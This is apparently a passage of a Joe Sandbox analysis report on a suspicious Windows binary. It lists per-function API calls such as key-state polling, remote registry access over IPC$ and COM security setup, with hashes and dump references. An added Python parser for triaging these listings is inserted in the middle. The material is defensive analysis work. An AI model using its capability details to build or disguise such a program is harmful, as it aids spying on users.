                                                                                                                    • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                    • _memmove.LIBCMT ref: 00467EB8
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                    • _memmove.LIBCMT ref: 00467F6C
                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
• String ID:
• API String ID: 2170234536-0
• Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
• Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
• Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
• Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
APIs
• GetKeyboardState.USER32(?), ref: 00453CE0
• SetKeyboardState.USER32(?), ref: 00453D3B
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(000000A0), ref: 00453D75
• GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
• GetKeyState.USER32(000000A1), ref: 00453DB5
• GetAsyncKeyState.USER32(00000011), ref: 00453DE1
• GetKeyState.USER32(00000011), ref: 00453DEF
• GetAsyncKeyState.USER32(00000012), ref: 00453E18
• GetKeyState.USER32(00000012), ref: 00453E26
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
• GetKeyState.USER32(0000005B), ref: 00453E5D
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
• Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
• Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
• Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
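The API listing of the function above is the kind of block an analyst has to triage by hand for every function in a report of this size. The following is an added example, not part of the Joe Sandbox report and not code from the sample: a small parser for this report's per-function "APIs" listing format that turns each bullet into a structured record, names the virtual-key codes passed to GetAsyncKeyState/GetKeyState using the constants from the Windows SDK (winuser.h), and summarises what the function actually touches. The sample input is the listing of the function above, copied verbatim. The regular expression is written for the bullet format seen on this page (including the indented "Part of subcall function" lines); whether it matches every entry in other reports is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the "APIs" listing of the keyboard-state function from the
# report above, copied as extracted (bullet, API.module(args), ref: address).
SAMPLE_LISTING = """\
• GetKeyboardState.USER32(?), ref: 00453CE0
• SetKeyboardState.USER32(?), ref: 00453D3B
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(000000A0), ref: 00453D75
• GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
• GetKeyState.USER32(000000A1), ref: 00453DB5
• GetAsyncKeyState.USER32(00000011), ref: 00453DE1
• GetKeyState.USER32(00000011), ref: 00453DEF
• GetAsyncKeyState.USER32(00000012), ref: 00453E18
• GetKeyState.USER32(00000012), ref: 00453E26
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
• GetKeyState.USER32(0000005B), ref: 00453E5D
"""

# Virtual-key codes from the Windows SDK (winuser.h); only the modifier keys
# relevant to this listing plus a few neighbours are included.
VK_NAMES: Dict[int, str] = {
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
    0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
    0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
    0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU",
}
MODIFIER_VKS = set(VK_NAMES.values())
KEY_QUERY_APIS = {"GetAsyncKeyState", "GetKeyState"}

# One bullet of the listing. The "Part of subcall function XXXXXXXX:" prefix is
# optional, the argument list is optional (CRT calls have none), and the ref
# address is always an 8-digit hex value.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report shows '?'
    ref: int                    # call-site address
    subcall_of: Optional[int]   # address of the callee when listed as a subcall


def parse_arg(token: str) -> Optional[int]:
    """'?' means the sandbox could not recover the value; hex may carry a sign."""
    token = token.strip()
    if token in ("", "?"):
        return None
    return int(token, 16)       # int() accepts a leading '-' such as -000000FB


def parse_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue            # headings such as "APIs" or "Strings"
        raw = m.group("args")
        args = [] if raw is None else [parse_arg(a) for a in raw.split(",")]
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), sub))
    return calls


def polled_keys(calls: List[ApiCall]) -> Dict[int, str]:
    """Distinct virtual keys queried via GetAsyncKeyState/GetKeyState, named."""
    keys = {}
    for c in calls:
        if c.api in KEY_QUERY_APIS and c.args and c.args[0] is not None:
            keys[c.args[0]] = VK_NAMES.get(c.args[0], f"VK_0x{c.args[0]:02X}")
    return dict(sorted(keys.items()))


def summarize(calls: List[ApiCall]) -> dict:
    keys = polled_keys(calls)
    refs = [c.ref for c in calls if c.subcall_of is None]
    return {
        "apis": sorted({c.api for c in calls}),
        "polled_keys": keys,
        # True when every queried key is a modifier: a function that only reads
        # Shift/Ctrl/Alt/Win state is not, by itself, a keystroke logger.
        "modifiers_only": bool(keys) and all(n in MODIFIER_VKS for n in keys.values()),
        "writes_keyboard_state": any(c.api == "SetKeyboardState" for c in calls),
        "ref_range": (min(refs), max(refs)) if refs else None,
    }


if __name__ == "__main__":
    for k, v in summarize(parse_listing(SAMPLE_LISTING)).items():
        print(f"{k}: {v}")
```

Run on the listing above, the summary reports that the function queries only VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU and VK_LWIN, writes the keyboard state back with SetKeyboardState, and spans call sites 0x453CE0 to 0x453E5D. That is the check worth making before reading the "Keyboard" similarity tag as keylogging: polling modifier state and restoring it is more consistent with code that synthesises or normalises input than with a hook that records every keystroke, and the report itself does not classify this function either way.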
APIs
• GetDlgItem.USER32(?,00000001), ref: 004357DB
• GetWindowRect.USER32(00000000,?), ref: 004357ED
• MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
• GetDlgItem.USER32(?,00000002), ref: 0043586A
• GetWindowRect.USER32(00000000,?), ref: 0043587C
• MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
• GetDlgItem.USER32(?,000003E9), ref: 004358DC
• GetWindowRect.USER32(00000000,?), ref: 004358EE
• MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
• GetDlgItem.USER32(?,000003EA), ref: 00435941
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
• InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
• Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
• Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
• Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 004714DC
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
• SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
• DeleteObject.GDI32(?), ref: 0047151E
• DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
• SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
• DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
• SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
• DeleteObject.GDI32(?), ref: 004715EA
• DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
• String ID:
• API String ID: 3218148540-0
• Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
• Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
• Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
• Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
APIs
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
• Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
• Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
• Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
• Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
APIs
• _wcsncpy.LIBCMT ref: 00467490
• _wcsncpy.LIBCMT ref: 004674BC
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• _wcstok.LIBCMT ref: 004674FF
  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
• _wcstok.LIBCMT ref: 004675B2
• GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
• _wcslen.LIBCMT ref: 00467793
• _wcscpy.LIBCMT ref: 00467641
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcslen.LIBCMT ref: 004677BD
• GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
• String ID: X
• API String ID: 3104067586-3081909835
• Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
• Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
• Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
• Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
APIs
• OleInitialize.OLE32(00000000), ref: 0046CBC7
• CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
• CLSIDFromString.OLE32(?,?), ref: 0046CBF1
• CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
• _wcslen.LIBCMT ref: 0046CDB0
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
• CoTaskMemFree.OLE32(?), ref: 0046CE42
• CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
Strings
• NULL Pointer assignment, xrefs: 0046CEA6
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 440038798-2785691316
                                                                                                                    • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                    • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                    • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                    • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00461056
• GetWindowTextW.USER32(?,?,00000400), ref: 00461092
• _wcslen.LIBCMT ref: 004610A3
• CharUpperBuffW.USER32(?,00000000), ref: 004610B1
• GetClassNameW.USER32(?,?,00000400), ref: 00461124
• GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
• GetClassNameW.USER32(?,?,00000400), ref: 004611A1
• GetClassNameW.USER32(?,?,00000400), ref: 004611D9
• GetWindowRect.USER32(?,?), ref: 00461248
  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
• String ID: ThumbnailClass
• API String ID: 4136854206-1241985126
• Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
• Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
• Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
• SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
• SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
• GetClientRect.USER32(?,?), ref: 00471A1A
• RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
• DestroyIcon.USER32(?), ref: 00471AF4
Similarity
• API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
• String ID: 2
• API String ID: 1331449709-450215437
• Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
• Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
• Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
• Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
Similarity
• API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
• API String ID: 3054410614-2561132961
• Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
• Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
• Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
• Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
• CLSIDFromString.OLE32(?,?), ref: 004587B3
• RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
• RegCloseKey.ADVAPI32(?), ref: 004587C5
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 600699880-22481851
• Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
• Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
• Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
• Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
Similarity
• API ID: DestroyWindow
• String ID: static
• API String ID: 3375834691-2160076837
• Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
• Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
• Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
• Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D959
• GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                    • API String ID: 2907320926-3566645568
                                                                                                                    • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                    • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                    • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                    • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
APIs
  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyAcceleratorTable.USER32(?), ref: 0047094A
• ImageList_Destroy.COMCTL32(?), ref: 004709AD
• ImageList_Destroy.COMCTL32(?), ref: 004709C5
• ImageList_Destroy.COMCTL32(?), ref: 004709D5
• DeleteObject.GDI32(00780045), ref: 00470A04
• DestroyIcon.USER32(00740069), ref: 00470A1C
• DeleteObject.GDI32(5088B673), ref: 00470A34
• DestroyWindow.USER32(0041005C), ref: 00470A4C
• DestroyIcon.USER32(?), ref: 00470A73
• DestroyIcon.USER32(?), ref: 00470A81
• KillTimer.USER32(00000000,00000000), ref: 00470B00
Similarity
• API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
• String ID:
• API String ID: 1237572874-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
• SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
• VariantInit.OLEAUT32(?), ref: 004793E1
• SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
• VariantCopy.OLEAUT32(?,?), ref: 00479461
• SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
• VariantClear.OLEAUT32(?), ref: 00479489
• SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
• VariantClear.OLEAUT32(?), ref: 004794CA
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
• GetKeyboardState.USER32(?), ref: 0044480E
• GetAsyncKeyState.USER32(000000A0), ref: 00444899
• GetKeyState.USER32(000000A0), ref: 004448AA
• GetAsyncKeyState.USER32(000000A1), ref: 004448C8
• GetKeyState.USER32(000000A1), ref: 004448D9
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
• GetKeyState.USER32(00000011), ref: 00444903
• GetAsyncKeyState.USER32(00000012), ref: 0044491F
• GetKeyState.USER32(00000012), ref: 0044492D
• GetAsyncKeyState.USER32(0000005B), ref: 00444949
• GetKeyState.USER32(0000005B), ref: 00444958
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
Similarity
• API ID: InitVariant$_malloc_wcscpy_wcslen
• String ID:
• API String ID: 3413494760-0
APIs
Similarity
• API ID: AddressProc_free_malloc$_strcat_strlen
• String ID: AU3_FreeVar
• API String ID: 2634073740-771828931
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                    • CoUninitialize.OLE32 ref: 0046C645
